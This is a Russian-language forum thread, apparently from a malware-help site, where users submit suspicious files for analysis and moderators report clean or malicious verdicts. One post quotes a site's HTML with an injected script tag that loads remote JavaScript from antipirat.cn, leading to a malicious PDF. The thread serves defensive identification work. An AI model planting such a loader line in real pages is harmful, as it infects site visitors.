Результат загрузки
Файл сохранён как 090822_021854_Quarantine_4a8f1d4e1376f.zip
Размер файла 24123
MD5 8ca44af8b52815bd5dc1885e0968b897
Файл закачан, спасибо!
Printable View
Результат загрузки
Файл сохранён как 090822_021854_Quarantine_4a8f1d4e1376f.zip
Размер файла 24123
MD5 8ca44af8b52815bd5dc1885e0968b897
Файл закачан, спасибо!
[B]vegas[/B], C:\Program Files\Microsoft Common\svchost.exe - Worm.Win32.Bezopi.bj
файл запускается из темп папки,
Результат загрузки
Файл сохранён как 090823_165425_vir_4a913c017fbcb.zip
Размер файла 100015
MD5 6475a662a30a6671ddf9bfc34382113a
Файл закачан, спасибо!
[B]NickM[/B], файл анализируется. Хотя я могу с уверенностью сказать, что он чистый. Так это от Realtek.
Несколько недель этот файл пользователя не могу добавить в базу чистых AVZ. Опасного ничего не вижу.
Файл сохранён как 090825_113653_virus_4a9394954a6b2.zip
Размер файла 299068
MD5 ebfd612b376d71c6540ebcf430a3bb93
Чистый...
Результат загрузки
Файл сохранён как 090825_181227_virus_4a93f14b415c8.zip
Размер файла 290940
MD5 826d9fb8b40d03aa4891b948da899bd0
Файл закачан, спасибо!
на вирустотал детект неоднозначный [url]http://www.virustotal.com/analisis/7c72c9ea31795ab18870ae395cf754a9045e31639ea0a3d7cf6f05141fb2b316-1251208899[/url]
[B]NickM[/B], install_winrout.bak проанализирован аналитиками ЛК, ответ: чистый.
Результат загрузки
Файл сохранён как 090826_121211_virus_4a94ee5b70b21.zip
Размер файла 2728392
MD5 9bfc1f12df97daf21972c80432ee57bf
Файл закачан, спасибо!
Результат загрузки
Файл сохранён как 090826_162139_virus_4a9528d3981ff.zip
Размер файла 74759
MD5 1bc3cf880222fec4571d4d3adeb3bfcc
Файл закачан, спасибо!
сидит в system32, после удаления восстанавливается
[B]vistaorxpmoy[/B],
Secrun.exe- [B]Net-Worm.Win32.Kolab.drb[/B]
[B]NickM[/B],
Файл безопасный...
Результат загрузки
Файл сохранён как 090827_162914_virus_4a967c1aea837.zip
Размер файла 165507
MD5 cb86a6cfc2d46b14788ce3b69781a2c3
Файл закачан, спасибо!
на вирустотал [url]http://www.virustotal.com/analisis/4e0d727d0532eb69c5eb942bbd4ef97bd6ad04ccd7884bc58f4ac6b1e2ea501d-1251375784[/url],
C:\WINDOWS\system32\REBUILDI.EXE
Активен, Ключ реестра, HKEY_USERS, S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce, Rebuild Icon Cache
Новый зловред, уже второй день детектится только касперским - ей богу обидно!
[QUOTE]Файл сохранён как 090827_164443_virus_4a967fbbb194b.zip
Размер файла 199839
MD5 3160bfe32e62ec9dc83092810cfa9e34[/QUOTE]
пароль на архив: virus
[QUOTE]Новый зловред, уже второй день детектится только касперским - ей богу обидно![/QUOTE]
Тогда это форма бесполезна для вас :)
Файл сохранён как 090828_074827_virus_4a97538b9273f.zip
Размер файла 656
MD5 b1216eca9b5de38286dae07b1c9e9249
[B]valho[/B],
Вы прислали текстовый файл, он не может быть опасен и обработке не подлежит...
[QUOTE=Гриша;457561][B]valho[/B],
Вы прислали текстовый файл, он не может быть опасен и обработке не подлежит...[/QUOTE]
Ну я его на сайте одном нашёл с таким скриптом
[CODE]<script src=http://antipirat.cn/file/1.txt></script>[/CODE]
ну лана тогда... :)
[QUOTE='valho;457563']Ну я его на сайте одном нашёл с таким скриптом
[/QUOTE]
А там - ПДФка [url]http://www.virustotal.com/ru/analisis/0f736ea2e1306960a4fe124005c57f99ceea32837400d8109c92f068d2ae9dd7-1251436654[/url]
[CODE]<html>
<head>
<title>по жанру - Старые Игры: бесплатно скачать флеш игры, компьютерные java игры, скачать psp игры, прохождение</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<link href="/css/oldgames.css" rel="stylesheet" type="text/css">
</head>
<body><script src=[COLOR="Red"]http://antipirat.cn/file/1.txt[/COLOR]></script>
<div class="header">
<div class="nav">
<a href="http://oldgames.ru/"><img src="/images/oldgames/home.gif" />главная</a>
<a href="/search/"><img src="/images/oldgames/search.gif" />поиск</a>
<noindex><a href="http://forum.oldgames.ru"><img src="/images/oldgames/forum.gif" />форум</a></noindex>
<a href="/feedback/"><img src="/images/oldgames/mail.gif" />обратная связь</a>
<a href="/map/"><img src="/images/oldgames/search.gif" />карта</a>
</div>[/CODE]
и т.д
Интересно, а чем он тогда может быть закодирован этот .txt?
Ведь туда кто то что то прописывает наверно, периодически
[B]valho[/B], ни чем он не закодирован.
Просто там еще один JS-скрипт, который ставит следующий и-фрейм.
Результат загрузкиФайл сохранён как 090828_225659_virus_4a98287b92ec3.zip
Размер файла 413069
MD5 047310ceffadbd273e843823343f9f67
Файл закачан, спасибо!
якобы прога для сбора бонусов, явно чего-то вредоносное, но хотелось бы узнать точно. Свалилась от анонима в файлы@mail.ru
[QUOTE]Результат загрузкиФайл сохранён как 090828_225659_virus_4a98287b92ec3.zip
Размер файла 413069
MD5 047310ceffadbd273e843823343f9f67
[/QUOTE]
[QUOTE]auto_rublik_v.7.dll- чистый
auto_rublik_v.7.exe- [B]Backdoor.Win32.Infexor.cy[/B][/QUOTE]
...
Проверьте карантинчик, плз:
Файл сохранён как 090830_163719_virusinfo_cure_4a9a727f8d806.zip
Размер файла 1689288
MD5 213da01bb6fb7892f15c422d0ff17f98
Файл сохранён как 090830_200310_virus_4a9aa2be81a10.zip
Размер файла 37387
MD5 f2dd6a2f2b10f772dbfc90e131292187
скрытый pif на флэшке,
[url]http://www.virustotal.com/analisis/29df2d237385b30f2152b7bfd5b8f138182b2874a0b278e9b4ca24dbc5725a6d-1251647839[/url]
[B]NickM[/B], "скрытый pif" это обыкновенный Блокнот к которому дописали кучу нулей.
снят с флэшки друга, посмотрел логи Касперского на его компе, походу это пролеченный файл после Sality
Чистый...
Вопрос по теме.
Проверка в этой теме: более эффективна, не менее эффективна или менее эффективна чем на:
virustotal.com
virusscan.jotti.org
virscan.net и т.д. ?
[B]9073[/B], Семплы из этой темы отсылаются вирусным аналитикам AV-вернодов, и лишь после их ответа здесь публикуется результат
В общем файлов я не нашел (нашел бы удалил для проверки бы)...
Антивирус Касперского 2009 сегодняшнего обновления ничего не находит как и AVZ 4.32.
Признаки таковы: при нажатии комбинации клавиш CTRL + V (вставка, при копировании файлов например из архива WinRAR на рабочий стол или просто при копировании файлов) открывается еще дважды папка (explorer) "C:\Documents and Settings\All Users\Главное меню\Программы".
Я незнаю как выловить процесс, делающий это. Это происходит уже дней 6-7... Со всеми подряд файлами. Честно говоря бесит закрывать эти папочки.
Вам в "помогите" и читать правила.
[B]FEV[/B], а проверку по [URL="http://virusinfo.info/pravila.html"]правилам[/URL] слабо сделать?
Файл сохранён как 090909_165621_virus_4aa7a5f50e394.zip
Размер файла 43948
MD5 6c3ea21cdcd6f7307a69d45586933b28
MD5 f601fb06b7b04e67ce5ed20fe179e9d0
Ответ мне говорить не надо, сам посмотрю потом :)
[size="1"][color="#666686"][B][I]Добавлено через 2 минуты[/I][/B][/color][/size]
[B]paul-13[/B], Ваши файлы чистые.
[B]Результат загрузки[/B]
Файл сохранён как 090910_161811_virus_4aa8ee83641d9.zip
Размер файла 593
MD5 76ff04eff19380e4d22fcb21a9d12a1b[B]
Файл закачан, спасибо![/B]
[B]Torvic99[/B],
Этот файл не опасен, можно его было открыть в HEX редакторе, там только цифра 8 внутри :)
[QUOTE=Гриша;465487][B]Torvic99[/B],
Этот файл не опасен, можно его было открыть в HEX редакторе, там только цифра 8 внутри :)[/QUOTE]
Вот же блин, я даже и не подумал хотя бы фаром по ф3 глянуть.
Увидел длл в папке "C:\Documents and Settings\All Users\Application Data" ну и через АВЗ его закарантинил.
DrWeb обнаружил троянов (два файла .dll в каталоге C:\System Volume Information\...) и обозвал их Trojan.Chrome.origin. Облазил все поисковики - не нашел упоминания о таком вирусе. Мне интересно DrWeb что их от болды именует?! Если на сайте самого DrWeb нет упоминаний о таком вирусе :(
Что за вирус и с чем его едят?
ЗЫ: Большей информацией пока не владею, доступа к системнику нет, только на мониторе окошко с вебером :(
[QUOTE='boy;465679']DrWeb обнаружил троянов (два файла .dll [/QUOTE]Вы эти файлы загрузили как положено (см. начало темы)?
[QUOTE=AndreyKa;465680]Вы эти файлы загрузили как положено (см. начало темы)?[/QUOTE]
Я файлы не загружал и не смогу до завтра загрузить (нет доступа к системнику), из информации только надпись в окне DrWeb :(
ЗЫ: просто хочу подготовится к завтрашнему разбору